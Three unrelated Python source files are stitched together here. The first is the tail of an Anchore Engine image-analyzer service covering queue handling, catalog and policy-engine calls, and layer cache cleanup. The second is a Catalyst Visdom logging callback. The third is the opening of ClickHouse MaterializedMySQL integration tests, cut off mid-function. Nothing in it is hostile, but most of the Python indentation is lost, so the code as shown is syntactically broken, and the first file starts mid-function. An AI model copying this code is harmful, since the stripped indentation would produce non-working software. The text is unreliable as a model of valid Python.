logger.spew("timing: analyze start: " + str(int(time.time()) - timer))
logger.info("performing analysis on image: " + str([userId, pullstring, fulltag]))
logger.debug("obtaining anchorelock..." + str(pullstring))
with anchore_engine.clients.localanchore_standalone.get_anchorelock(lockId=pullstring, driver='nodocker'):
logger.debug("obtaining anchorelock successful: " + str(pullstring))
analyzed_image_report = localanchore_standalone.analyze_image(userId, registry_manifest, image_record, tmpdir, localconfig, registry_creds=registry_creds, use_cache_dir=use_cache_dir)
ret_analyze = analyzed_image_report
logger.info("performing analysis on image complete: " + str(pullstring))
return (ret_analyze)
def process_analyzer_job(system_user_auth, qobj, layer_cache_enable):
global servicename #current_avg, current_avg_count
timer = int(time.time())
event = None
try:
logger.debug('dequeued object: {}'.format(qobj))
record = qobj['data']
userId = record['userId']
imageDigest = record['imageDigest']
manifest = record['manifest']
# check to make sure image is still in DB
catalog_client = internal_client_for(CatalogClient, userId)
try:
image_record = catalog_client.get_image(imageDigest)
if not image_record:
raise Exception("empty image record from catalog")
except Exception as err:
logger.warn("dequeued image cannot be fetched from catalog - skipping analysis (" + str(imageDigest) + ") - exception: " + str(err))
return (True)
logger.info("image dequeued for analysis: " + str(userId) + " : " + str(imageDigest))
if image_record['analysis_status'] != anchore_engine.subsys.taskstate.base_state('analyze'):
logger.debug("dequeued image is not in base state - skipping analysis")
return(True)
try:
logger.spew("TIMING MARK0: " + str(int(time.time()) - timer))
last_analysis_status = image_record['analysis_status']
image_record['analysis_status'] = anchore_engine.subsys.taskstate.working_state('analyze')
rc = catalog_client.update_image(imageDigest, image_record)
            # disable the webhook call for image state transition to 'analyzing'
#try:
# for image_detail in image_record['image_detail']:
# fulltag = image_detail['registry'] + "/" + image_detail['repo'] + ":" + image_detail['tag']
# npayload = {
# 'last_eval': {'imageDigest': imageDigest, 'analysis_status': last_analysis_status},
# 'curr_eval': {'imageDigest': imageDigest, 'analysis_status': image_record['analysis_status']},
# }
# rc = anchore_engine.subsys.notifications.queue_notification(userId, fulltag, 'analysis_update', npayload)
#except Exception as err:
# logger.warn("failed to enqueue notification on image analysis state update - exception: " + str(err))
# actually do analysis
registry_creds = catalog_client.get_registry()
try:
image_data = perform_analyze(userId, manifest, image_record, registry_creds, layer_cache_enable=layer_cache_enable)
except AnchoreException as e:
event = events.AnalyzeImageFail(user_id=userId, image_digest=imageDigest, error=e.to_dict())
raise
imageId = None
try:
imageId = image_data[0]['image']['imageId']
except Exception as err:
logger.warn("could not get imageId after analysis or from image record - exception: " + str(err))
try:
logger.debug("archiving analysis data")
rc = catalog_client.put_document('analysis_data', imageDigest, image_data)
except Exception as e:
err = CatalogClientError(msg='Failed to upload analysis data to catalog', cause=e)
event = events.ArchiveAnalysisFail(user_id=userId, image_digest=imageDigest, error=err.to_dict())
raise err
if rc:
try:
logger.debug("extracting image content data")
image_content_data = {}
for content_type in anchore_engine.common.image_content_types + anchore_engine.common.image_metadata_types:
try:
image_content_data[content_type] = anchore_engine.common.helpers.extract_analyzer_content(image_data, content_type, manifest=manifest)
except:
image_content_data[content_type] = {}
if image_content_data:
logger.debug("adding image content data to archive")
rc = catalog_client.put_document('image_content_data', imageDigest, image_content_data)
try:
logger.debug("adding image analysis data to image_record")
anchore_engine.common.helpers.update_image_record_with_analysis_data(image_record, image_data)
except Exception as err:
raise err
except Exception as err:
import traceback
traceback.print_exc()
logger.warn("could not store image content metadata to archive - exception: " + str(err))
logger.debug("adding image record to policy-engine service (" + str(userId) + " : " + str(imageId) + ")")
try:
if not imageId:
raise Exception("cannot add image to policy engine without an imageId")
localconfig = anchore_engine.configuration.localconfig.get_config()
verify = localconfig['internal_ssl_verify']
pe_client = internal_client_for(PolicyEngineClient, userId)
try:
logger.debug("clearing any existing record in policy engine for image: " + str(imageId))
rc = pe_client.delete_image(user_id=userId, image_id=imageId)
except Exception as err:
logger.warn("exception on pre-delete - exception: " + str(err))
logger.info('Loading image into policy engine: {} {}'.format(userId, imageId))
image_analysis_fetch_url='catalog://'+str(userId)+'/analysis_data/'+str(imageDigest)
logger.debug("policy engine request: " + image_analysis_fetch_url)
resp = pe_client.ingress_image(userId, imageId, image_analysis_fetch_url)
logger.debug("policy engine image add response: " + str(resp))
except Exception as err:
newerr = PolicyEngineClientError(msg='Adding image to policy-engine failed', cause=str(err))
event = events.LoadAnalysisFail(user_id=userId, image_digest=imageDigest, error=newerr.to_dict())
raise newerr
logger.debug("updating image catalog record analysis_status")
last_analysis_status = image_record['analysis_status']
image_record['analysis_status'] = anchore_engine.subsys.taskstate.complete_state('analyze')
image_record['analyzed_at'] = int(time.time())
rc = catalog_client.update_image(imageDigest, image_record)
try:
annotations = {}
try:
if image_record.get('annotations', '{}'):
annotations = json.loads(image_record.get('annotations', '{}'))
except Exception as err:
logger.warn("could not marshal annotations from json - exception: " + str(err))
for image_detail in image_record['image_detail']:
fulltag = image_detail['registry'] + "/" + image_detail['repo'] + ":" + image_detail['tag']
last_payload = {'imageDigest': imageDigest, 'analysis_status': last_analysis_status, 'annotations': annotations}
curr_payload = {'imageDigest': imageDigest, 'analysis_status': image_record['analysis_status'], 'annotations': annotations}
npayload = {
'last_eval': last_payload,
'curr_eval': curr_payload,
}
if annotations:
npayload['annotations'] = annotations
rc = anchore_engine.subsys.notifications.queue_notification(userId, fulltag, 'analysis_update', npayload)
except Exception as err:
logger.warn("failed to enqueue notification on image analysis state update - exception: " + str(err))
else:
err = CatalogClientError(msg='Failed to upload analysis data to catalog', cause='Invalid response from catalog API - {}'.format(str(rc)))
event = events.ArchiveAnalysisFail(user_id=userId, image_digest=imageDigest, error=err.to_dict())
raise err
logger.info("analysis complete: " + str(userId) + " : " + str(imageDigest))
logger.spew("TIMING MARK1: " + str(int(time.time()) - timer))
try:
run_time = float(time.time() - timer)
#current_avg_count = current_avg_count + 1.0
#new_avg = current_avg + ((run_time - current_avg) / current_avg_count)
#current_avg = new_avg
anchore_engine.subsys.metrics.histogram_observe('anchore_analysis_time_seconds', run_time, buckets=[1.0, 5.0, 10.0, 30.0, 60.0, 120.0, 300.0, 600.0, 1800.0, 3600.0], status="success")
#anchore_engine.subsys.metrics.counter_inc('anchore_images_analyzed_total')
#localconfig = anchore_engine.configuration.localconfig.get_config()
#service_record = {'hostid': localconfig['host_id'], 'servicename': servicename}
#anchore_engine.subsys.servicestatus.set_status(service_record, up=True, available=True, detail={'avg_analysis_time_sec': current_avg, 'total_analysis_count': current_avg_count}, update_db=True)
except Exception as err:
logger.warn(str(err))
pass
except Exception as err:
run_time = float(time.time() - timer)
logger.exception("problem analyzing image - exception: " + str(err))
anchore_engine.subsys.metrics.histogram_observe('anchore_analysis_time_seconds', run_time, buckets=[1.0, 5.0, 10.0, 30.0, 60.0, 120.0, 300.0, 600.0, 1800.0, 3600.0], status="fail")
image_record['analysis_status'] = anchore_engine.subsys.taskstate.fault_state('analyze')
image_record['image_status'] = anchore_engine.subsys.taskstate.fault_state('image_status')
rc = catalog_client.update_image(imageDigest, image_record)
finally:
if event:
try:
catalog_client.add_event(event)
except:
logger.error('Ignoring error creating analysis failure event')
except Exception as err:
logger.warn("job processing bailed - exception: " + str(err))
raise err
return (True)
# TODO should probably be defined in and raised by the clients
class CatalogClientError(AnchoreException):
    def __init__(self, cause, msg='Failed to execute catalog API'):
self.cause = str(cause)
self.msg = msg
def __repr__(self):
return '{} - exception: {}'.format(self.msg, self.cause)
def __str__(self):
return '{} - exception: {}'.format(self.msg, self.cause)
class PolicyEngineClientError(AnchoreException):
    def __init__(self, cause, msg='Failed to execute policy engine API'):
self.cause = str(cause)
self.msg = msg
def __repr__(self):
return '{} - exception: {}'.format(self.msg, self.cause)
def __str__(self):
return '{} - exception: {}'.format(self.msg, self.cause)
def handle_layer_cache(**kwargs):
try:
localconfig = anchore_engine.configuration.localconfig.get_config()
myconfig = localconfig['services']['analyzer']
cachemax_gbs = int(myconfig.get('layer_cache_max_gigabytes', 1))
cachemax = cachemax_gbs * 1000000000
try:
tmpdir = localconfig['tmp_dir']
except Exception as err:
logger.warn("could not get tmp_dir from localconfig - exception: " + str(err))
tmpdir = "/tmp"
use_cache_dir = os.path.join(tmpdir, "anchore_layercache")
if os.path.exists(use_cache_dir):
totalsize = 0
layertimes = {}
layersizes = {}
try:
for f in os.listdir(os.path.join(use_cache_dir, 'sha256')):
layerfile = os.path.join(use_cache_dir, 'sha256', f)
layerstat = os.stat(layerfile)
totalsize = totalsize + layerstat.st_size
layersizes[layerfile] = layerstat.st_size
layertimes[layerfile] = max([layerstat.st_mtime, layerstat.st_ctime, layerstat.st_atime])
if totalsize > cachemax:
logger.debug("layer cache total size ("+str(totalsize)+") exceeds configured cache max ("+str(cachemax)+") - performing cleanup")
currsize = totalsize
sorted_layers = sorted(list(layertimes.items()), key=operator.itemgetter(1))
while(currsize > cachemax):
rmlayer = sorted_layers.pop(0)
logger.debug("removing cached layer: " + str(rmlayer))
os.remove(rmlayer[0])
currsize = currsize - layersizes[rmlayer[0]]
logger.debug("currsize after remove: " + str(currsize))
except Exception as err:
raise(err)
except Exception as err:
raise(err)
return(True)
def handle_image_analyzer(*args, **kwargs):
"""
Processor for image analysis requests coming from the work queue
:param args:
:param kwargs:
:return:
"""
global system_user_auth, queuename, servicename
cycle_timer = kwargs['mythread']['cycle_timer']
localconfig = anchore_engine.configuration.localconfig.get_config()
system_user_auth = localconfig['system_user_auth']
threads = []
layer_cache_dirty = True
while(True):
logger.debug("analyzer thread cycle start")
try:
myconfig = localconfig['services']['analyzer']
max_analyze_threads = int(myconfig.get('max_threads', 1))
layer_cache_enable = myconfig.get('layer_cache_enable', False)
logger.debug("max threads: " + str(max_analyze_threads))
q_client = internal_client_for(SimpleQueueClient, userId=None)
if len(threads) < max_analyze_threads:
logger.debug("analyzer has free worker threads {} / {}".format(len(threads), max_analyze_threads))
qobj = q_client.dequeue(queuename)
if qobj:
logger.debug("got work from queue task Id: {}".format(qobj.get('queueId', 'unknown')))
myqobj = copy.deepcopy(qobj)
logger.spew("incoming queue object: " + str(myqobj))
logger.debug("incoming queue task: " + str(list(myqobj.keys())))
logger.debug("starting thread")
athread = threading.Thread(target=process_analyzer_job, args=(system_user_auth, myqobj,layer_cache_enable))
athread.start()
threads.append(athread)
logger.debug("thread started")
layer_cache_dirty = True
else:
logger.debug("analyzer queue is empty - no work this cycle")
else:
logger.debug("all workers are busy")
alive_threads = []
while(threads):
athread = threads.pop()
                if not athread.is_alive():
try:
logger.debug("thread completed - joining")
athread.join()
logger.debug("thread joined")
except Exception as err:
logger.warn("cannot join thread - exception: " + str(err))
else:
alive_threads.append(athread)
threads = alive_threads
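            # Only prune the layer cache when caching is enabled, at least one analysis has run
            # since the last pruning, and no worker thread is active (so no layer is in use).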
if layer_cache_enable and layer_cache_dirty and len(threads) == 0:
logger.debug("running layer cache handler")
try:
handle_layer_cache()
layer_cache_dirty = False
except Exception as err:
logger.warn("layer cache management failed - exception: " + str(err))
except Exception as err:
logger.exception('Failure in image analysis loop')
logger.debug("analyzer thread cycle complete: next in "+str(cycle_timer))
time.sleep(cycle_timer)
return(True)
def handle_metrics(*args, **kwargs):
cycle_timer = kwargs['mythread']['cycle_timer']
while(True):
try:
localconfig = anchore_engine.configuration.localconfig.get_config()
try:
tmpdir = localconfig['tmp_dir']
svfs = os.statvfs(tmpdir)
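                # Free space usable by unprivileged processes: filesystem block size times the
                # number of free blocks available to non-superuser processes.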
available_bytes = svfs.f_bsize * svfs.f_bavail
anchore_engine.subsys.metrics.gauge_set("anchore_tmpspace_available_bytes", available_bytes)
except Exception as err:
logger.warn("unable to detect available bytes probe - exception: " + str(err))
except Exception as err:
logger.warn("handler failed - exception: " + str(err))
time.sleep(cycle_timer)
return(True)
# monitor infrastructure
# monitors = {
# 'service_heartbeat': {'handler': anchore_engine.subsys.servicestatus.handle_service_heartbeat, 'taskType': 'handle_service_heartbeat', 'args': [AnalyzerService.__service_name__], 'cycle_timer': 60, 'min_cycle_timer': 60, 'max_cycle_timer': 60, 'last_queued': 0, 'last_return': False, 'initialized': False},
# 'image_analyzer': {'handler': handle_image_analyzer, 'taskType': 'handle_image_analyzer', 'args': [], 'cycle_timer': 1, 'min_cycle_timer': 1, 'max_cycle_timer': 120, 'last_queued': 0, 'last_return': False, 'initialized': False},
# 'handle_metrics': {'handler': handle_metrics, 'taskType': 'handle_metrics', 'args': [servicename], 'cycle_timer': 15, 'min_cycle_timer': 15, 'max_cycle_timer': 15, 'last_queued': 0, 'last_return': False, 'initialized': False},
# }
# monitor_threads = {}
class AnalyzerService(ApiService):
__service_name__ = 'analyzer'
__spec_dir__ = pkg_resources.resource_filename(__name__, 'swagger')
__service_api_version__ = 'v1'
__monitors__ = {
'service_heartbeat': {'handler': anchore_engine.subsys.servicestatus.handle_service_heartbeat, 'taskType': 'handle_service_heartbeat', 'args': [__service_name__], 'cycle_timer': 60, 'min_cycle_timer': 60, 'max_cycle_timer': 60, 'last_queued': 0, 'last_return': False, 'initialized': False},
'image_analyzer': {'handler': handle_image_analyzer, 'taskType': 'handle_image_analyzer', 'args': [], 'cycle_timer': 5, 'min_cycle_timer': 1, 'max_cycle_timer': 120, 'last_queued': 0, 'last_return': False, 'initialized': False},
'handle_metrics': {'handler': handle_metrics, 'taskType': 'handle_metrics', 'args': [__service_name__], 'cycle_timer': 15, 'min_cycle_timer': 15, 'max_cycle_timer': 15, 'last_queued': 0, 'last_return': False, 'initialized': False},
}
|
visdom_logger.py
|
from typing import Dict, List, Union
from collections import Counter
import logging
import queue
import threading
import time
from alchemy.logger import Logger
import visdom
from catalyst.core.callback import (
Callback,
CallbackNode,
CallbackOrder,
CallbackScope,
)
from catalyst.core.runner import IRunner
class Visdom(Logger):
"""Logger, translates ``runner.*_metrics`` to Visdom.
Read about Visdom here https://github.com/facebookresearch/visdom
Example:
.. code-block:: python
VisdomLogger(
env_name="...", # enviroment name
server="localhost", # visdom server name
port=8097, # visdom server port
)
"""
def __init__(
self,
env_name: str,
batch_size: int = None,
server: str = "localhost",
port: int = 8097,
log_to_filename: str = None,
username: str = None,
password: str = None,
):
"""
Args:
env_name (str): Environment name to plot to when
no env is provided (default: main)
batch_size (int): batch_size for log_on_batch_end
            server (str): the hostname of your
                visdom server (default: 'localhost')
            port (int): the port for your visdom server (default: 8097)
            log_to_filename (str): if given, log all plotting and window
                events to this file so they can be replayed later (default: None)
username (str): username to use for authentication,
if server started with -enable_login (default: None)
password (str): password to use for authentication,
if server started with -enable_login (default: None)
"""
self._batch_size = max(int(batch_size or int(1e3)), 1)
self._counters = Counter()
self._queue = queue.Queue()
self._thread = threading.Thread(target=self._run_worker)
self._thread.start()
try:
self.viz = visdom.Visdom(
server=server,
port=port,
env=env_name,
log_to_filename=log_to_filename,
username=username,
password=password,
)
startup_sec = 1
while not self.viz.check_connection() and startup_sec > 0:
time.sleep(0.1)
startup_sec -= 0.1
assert (
self.viz.check_connection()
), "No connection could be formed quickly"
except BaseException as e:
logging.error(
"The visdom experienced an exception while"
+ "running: {}".format(repr(e))
)
def _run_worker(self):
"""Runs worker to gather batch statistics."""
running = True
while running:
batch = []
try:
while len(batch) < self._batch_size:
if batch:
msg = self._queue.get_nowait()
else:
msg = self._queue.get()
if msg is None:
running = False
break
batch.append(msg)
except queue.Empty:
pass
if batch:
self.plot_lines(batch)
def plot_lines(self, batch: List[Dict]):
"""Plots vales from batch statistics.
Args:
batch (List[Dict]): List with dictionaries from log_scalar
"""
for msg in batch:
opts = {
"xlabel": "epochs",
"legend": ["train", "valid"],
"ylabel": msg["name"],
"title": msg["name"],
}
self.viz.line(
X=[self._counters[msg["full_name"]]],
Y=[msg["value"]],
win=msg["name"],
name=msg["mode"],
update="append",
opts=opts,
)
def log_scalar(
self, name: str, mode: str, full_name: str, value: Union[int, float],
):
"""Logs scalar.
Args:
            name (str): Metric name (used as the title of the plot window)
mode (str): Metric's mode (example: train)
full_name (str): Full metric name
value (Union[int, float]): Metric's value
"""
self._queue.put(
{
"name": name,
"full_name": full_name,
"mode": mode,
"value": value,
"step": self._counters[full_name],
}
)
self._counters[full_name] += 1
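# A minimal usage sketch (not part of the original module; the environment and metric names
# below are placeholders): ``log_scalar`` only enqueues a message, and the background worker
# thread started in ``__init__`` batches the queued messages and sends them to the Visdom server.
def _visdom_usage_sketch():
    logger = Visdom(env_name="usage_sketch")  # assumes a Visdom server running on localhost:8097
    logger.log_scalar(name="loss", mode="train", full_name="train/loss", value=0.42)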
class VisdomLogger(Callback):
"""Logger callback, translates ``runner.*_metrics`` to Visdom.
Read about Visdom here https://github.com/facebookresearch/visdom
Example:
.. code-block:: python
from catalyst.dl import SupervisedRunner, VisdomLogger
runner = SupervisedRunner()
runner.train(
model=model,
criterion=criterion,
optimizer=optimizer,
loaders=loaders,
logdir=logdir,
num_epochs=num_epochs,
verbose=True,
callbacks={
"logger": VisdomLogger(
env_name="...", # enviroment name
server="localhost", # visdom server name
port=8097, # visdom server port
)
}
)
"""
def __init__(
self,
metric_names: List[str] = None,
log_on_batch_end: bool = False,
log_on_epoch_end: bool = True,
**logging_params,
):
"""
Args:
metric_names (List[str]): list of metric names to log,
if none - logs everything
log_on_batch_end (bool): logs per-batch metrics if set True
log_on_epoch_end (bool): logs per-epoch metrics if set True
"""
super().__init__(
order=CallbackOrder.Logging,
node=CallbackNode.Master,
scope=CallbackScope.Experiment,
)
self.metrics_to_log = metric_names
self.log_on_batch_end = log_on_batch_end
self.log_on_epoch_end = log_on_epoch_end
if not (self.log_on_batch_end or self.log_on_epoch_end):
raise ValueError("You have to log something!")
if (self.log_on_batch_end and not self.log_on_epoch_end) or (
not self.log_on_batch_end and self.log_on_epoch_end
):
self.batch_log_suffix = ""
self.epoch_log_suffix = ""
else:
self.batch_log_suffix = "_batch"
self.epoch_log_suffix = "_epoch"
self.logger = Visdom(**logging_params)
def _log_metrics(
self, metrics: Dict[str, float], step: int, mode: str, suffix=""
):
"""Translate batch metrics to Visdom logger.
Args:
metrics (Dict[str, float]): Metrics from Catalyst
step (int): Iteration step from Catalyst
mode (str): Metric's mode (example: train)
suffix (str): Additional suffix
"""
if self.metrics_to_log is None:
metrics_to_log = sorted(metrics.keys())
else:
metrics_to_log = self.metrics_to_log
for name in metrics_to_log:
if name in metrics:
# Renaming catalyst metric names to visdom formatting
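                # e.g. a Catalyst metric named "train_loss" (illustrative) becomes:
                #   real_mode = "train", metric_name = "loss", full_metric_name = "train/loss"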
real_mode = name.split("_")[0]
splitted_name = name.split(real_mode + "_")[-1]
metric_name = f"{splitted_name}{suffix}"
full_metric_name = f"{real_mode}/{metric_name}"
metric_value = metrics[name]
# Log values
self.logger.log_scalar(
metric_name, real_mode, full_metric_name, metric_value
)
def __del__(self):
"""@TODO: Docs. Contribution is welcome."""
self.logger.close()
def on_batch_end(self, runner: IRunner):
"""Translate batch metrics to Visdom."""
if self.log_on_batch_end:
mode = runner.loader_name
metrics_ = runner.batch_metrics
self._log_metrics(
metrics=metrics_,
step=runner.global_sample_step,
mode=mode,
suffix=self.batch_log_suffix,
)
def on_epoch_end(self, runner: IRunner):
"""Translate epoch metrics to Visdom."""
if self.log_on_epoch_end:
self._log_metrics(
metrics=runner.epoch_metrics,
step=runner.global_epoch,
mode=runner.loader_name,
suffix=self.epoch_log_suffix,
)
__all__ = ["VisdomLogger"]
|
materialize_with_ddl.py
|
import time
import pymysql.cursors
import pytest
from helpers.network import PartitionManager
import logging
from helpers.client import QueryRuntimeException
from helpers.cluster import get_docker_compose_path, run_and_check
import random
import threading
from multiprocessing.dummy import Pool
from helpers.test_tools import assert_eq_with_retry
def check_query(clickhouse_node, query, result_set, retry_count=10, interval_seconds=3):
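    """Poll clickhouse_node until `query` returns `result_set`, retrying up to `retry_count`
    times with `interval_seconds` between attempts; assert on the final result if it never
    matches."""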
    latest_result = ''
    for i in range(retry_count):
        try:
            latest_result = clickhouse_node.query(query)
            if result_set == latest_result:
                return
            logging.debug(f"latest_result {latest_result}")
time.sleep(interval_seconds)
except Exception as e:
logging.debug(f"check_query retry {i+1} exception {e}")
time.sleep(interval_seconds)
else:
assert clickhouse_node.query(query) == result_set
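# Example (illustrative table and values): block until the replicated table returns exactly
# "1\n", using the default 10 attempts with a 3-second interval:
#   check_query(clickhouse_node, "SELECT * FROM db.t FORMAT TSV", "1\n")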
def dml_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_dml")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_dml")
mysql_node.query("CREATE DATABASE test_database_dml DEFAULT CHARACTER SET 'utf8'")
# existed before the mapping was created
mysql_node.query("CREATE TABLE test_database_dml.test_table_1 ("
"`key` INT NOT NULL PRIMARY KEY, "
"unsigned_tiny_int TINYINT UNSIGNED, tiny_int TINYINT, "
"unsigned_small_int SMALLINT UNSIGNED, small_int SMALLINT, "
"unsigned_medium_int MEDIUMINT UNSIGNED, medium_int MEDIUMINT, "
"unsigned_int INT UNSIGNED, _int INT, "
"unsigned_integer INTEGER UNSIGNED, _integer INTEGER, "
"unsigned_bigint BIGINT UNSIGNED, _bigint BIGINT, "
"/* Need ClickHouse support read mysql decimal unsigned_decimal DECIMAL(19, 10) UNSIGNED, _decimal DECIMAL(19, 10), */"
"unsigned_float FLOAT UNSIGNED, _float FLOAT, "
"unsigned_double DOUBLE UNSIGNED, _double DOUBLE, "
"_varchar VARCHAR(10), _char CHAR(10), binary_col BINARY(8), "
"/* Need ClickHouse support Enum('a', 'b', 'v') _enum ENUM('a', 'b', 'c'), */"
"_date Date, _datetime DateTime, _timestamp TIMESTAMP, _bool BOOLEAN) ENGINE = InnoDB;")
# it already has some data
mysql_node.query("""
INSERT INTO test_database_dml.test_table_1 VALUES(1, 1, -1, 2, -2, 3, -3, 4, -4, 5, -5, 6, -6, 3.2, -3.2, 3.4, -3.4, 'varchar', 'char', 'binary',
'2020-01-01', '2020-01-01 00:00:00', '2020-01-01 00:00:00', true);
""")
clickhouse_node.query(
"CREATE DATABASE test_database_dml ENGINE = MaterializeMySQL('{}:3306', 'test_database_dml', 'root', 'clickhouse')".format(
service_name))
assert "test_database_dml" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SELECT * FROM test_database_dml.test_table_1 ORDER BY key FORMAT TSV",
"1\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t"
"2020-01-01 00:00:00\t2020-01-01 00:00:00\t1\n")
mysql_node.query("""
INSERT INTO test_database_dml.test_table_1 VALUES(2, 1, -1, 2, -2, 3, -3, 4, -4, 5, -5, 6, -6, 3.2, -3.2, 3.4, -3.4, 'varchar', 'char', 'binary',
'2020-01-01', '2020-01-01 00:00:00', '2020-01-01 00:00:00', false);
""")
check_query(clickhouse_node, "SELECT * FROM test_database_dml.test_table_1 ORDER BY key FORMAT TSV",
"1\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t"
"2020-01-01 00:00:00\t2020-01-01 00:00:00\t1\n2\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\t"
"varchar\tchar\tbinary\\0\\0\t2020-01-01\t2020-01-01 00:00:00\t2020-01-01 00:00:00\t0\n")
mysql_node.query("UPDATE test_database_dml.test_table_1 SET unsigned_tiny_int = 2 WHERE `key` = 1")
check_query(clickhouse_node, """
SELECT key, unsigned_tiny_int, tiny_int, unsigned_small_int,
small_int, unsigned_medium_int, medium_int, unsigned_int, _int, unsigned_integer, _integer,
unsigned_bigint, _bigint, unsigned_float, _float, unsigned_double, _double, _varchar, _char, binary_col,
_date, _datetime, /* exclude it, because ON UPDATE CURRENT_TIMESTAMP _timestamp, */
_bool FROM test_database_dml.test_table_1 ORDER BY key FORMAT TSV
""",
"1\t2\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t"
"2020-01-01 00:00:00\t1\n2\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\t"
"varchar\tchar\tbinary\\0\\0\t2020-01-01\t2020-01-01 00:00:00\t0\n")
# update primary key
mysql_node.query("UPDATE test_database_dml.test_table_1 SET `key` = 3 WHERE `unsigned_tiny_int` = 2")
check_query(clickhouse_node, "SELECT key, unsigned_tiny_int, tiny_int, unsigned_small_int,"
" small_int, unsigned_medium_int, medium_int, unsigned_int, _int, unsigned_integer, _integer, "
" unsigned_bigint, _bigint, unsigned_float, _float, unsigned_double, _double, _varchar, _char, binary_col, "
" _date, _datetime, /* exclude it, because ON UPDATE CURRENT_TIMESTAMP _timestamp, */ "
" _bool FROM test_database_dml.test_table_1 ORDER BY key FORMAT TSV",
"2\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\t"
"varchar\tchar\tbinary\\0\\0\t2020-01-01\t2020-01-01 00:00:00\t0\n3\t2\t-1\t2\t-2\t3\t-3\t"
"4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t2020-01-01 00:00:00\t1\n")
mysql_node.query('DELETE FROM test_database_dml.test_table_1 WHERE `key` = 2')
check_query(clickhouse_node, "SELECT key, unsigned_tiny_int, tiny_int, unsigned_small_int,"
" small_int, unsigned_medium_int, medium_int, unsigned_int, _int, unsigned_integer, _integer, "
" unsigned_bigint, _bigint, unsigned_float, _float, unsigned_double, _double, _varchar, _char, binary_col, "
" _date, _datetime, /* exclude it, because ON UPDATE CURRENT_TIMESTAMP _timestamp, */ "
" _bool FROM test_database_dml.test_table_1 ORDER BY key FORMAT TSV",
"3\t2\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t"
"2020-01-01 00:00:00\t1\n")
mysql_node.query('DELETE FROM test_database_dml.test_table_1 WHERE `unsigned_tiny_int` = 2')
check_query(clickhouse_node, "SELECT * FROM test_database_dml.test_table_1 ORDER BY key FORMAT TSV", "")
clickhouse_node.query("DROP DATABASE test_database_dml")
mysql_node.query("DROP DATABASE test_database_dml")
def materialized_mysql_database_with_views(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database")
mysql_node.query("CREATE DATABASE test_database DEFAULT CHARACTER SET 'utf8'")
# existed before the mapping was created
mysql_node.query("CREATE TABLE test_database.test_table_1 ("
"`key` INT NOT NULL PRIMARY KEY, "
"unsigned_tiny_int TINYINT UNSIGNED, tiny_int TINYINT, "
"unsigned_small_int SMALLINT UNSIGNED, small_int SMALLINT, "
"unsigned_medium_int MEDIUMINT UNSIGNED, medium_int MEDIUMINT, "
"unsigned_int INT UNSIGNED, _int INT, "
"unsigned_integer INTEGER UNSIGNED, _integer INTEGER, "
"unsigned_bigint BIGINT UNSIGNED, _bigint BIGINT, "
"/* Need ClickHouse support read mysql decimal unsigned_decimal DECIMAL(19, 10) UNSIGNED, _decimal DECIMAL(19, 10), */"
"unsigned_float FLOAT UNSIGNED, _float FLOAT, "
"unsigned_double DOUBLE UNSIGNED, _double DOUBLE, "
"_varchar VARCHAR(10), _char CHAR(10), binary_col BINARY(8), "
"/* Need ClickHouse support Enum('a', 'b', 'v') _enum ENUM('a', 'b', 'c'), */"
"_date Date, _datetime DateTime, _timestamp TIMESTAMP, _bool BOOLEAN) ENGINE = InnoDB;")
mysql_node.query("CREATE VIEW test_database.test_table_1_view AS SELECT SUM(tiny_int) FROM test_database.test_table_1 GROUP BY _date;")
# it already has some data
mysql_node.query("""
INSERT INTO test_database.test_table_1 VALUES(1, 1, -1, 2, -2, 3, -3, 4, -4, 5, -5, 6, -6, 3.2, -3.2, 3.4, -3.4, 'varchar', 'char', 'binary',
'2020-01-01', '2020-01-01 00:00:00', '2020-01-01 00:00:00', true);
""")
clickhouse_node.query(
"CREATE DATABASE test_database ENGINE = MaterializedMySQL('{}:3306', 'test_database', 'root', 'clickhouse')".format(
service_name))
assert "test_database" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SHOW TABLES FROM test_database FORMAT TSV", "test_table_1\n")
clickhouse_node.query("DROP DATABASE test_database")
mysql_node.query("DROP DATABASE test_database")
def materialized_mysql_database_with_datetime_and_decimal(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_dt")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_dt")
mysql_node.query("CREATE DATABASE test_database_dt DEFAULT CHARACTER SET 'utf8'")
mysql_node.query("CREATE TABLE test_database_dt.test_table_1 (`key` INT NOT NULL PRIMARY KEY, _datetime DateTime(6), _timestamp TIMESTAMP(3), _decimal DECIMAL(65, 30)) ENGINE = InnoDB;")
mysql_node.query("INSERT INTO test_database_dt.test_table_1 VALUES(1, '2020-01-01 01:02:03.999999', '2020-01-01 01:02:03.999', " + ('9' * 35) + "." + ('9' * 30) + ")")
mysql_node.query("INSERT INTO test_database_dt.test_table_1 VALUES(2, '2020-01-01 01:02:03.000000', '2020-01-01 01:02:03.000', ." + ('0' * 29) + "1)")
mysql_node.query("INSERT INTO test_database_dt.test_table_1 VALUES(3, '2020-01-01 01:02:03.9999', '2020-01-01 01:02:03.99', -" + ('9' * 35) + "." + ('9' * 30) + ")")
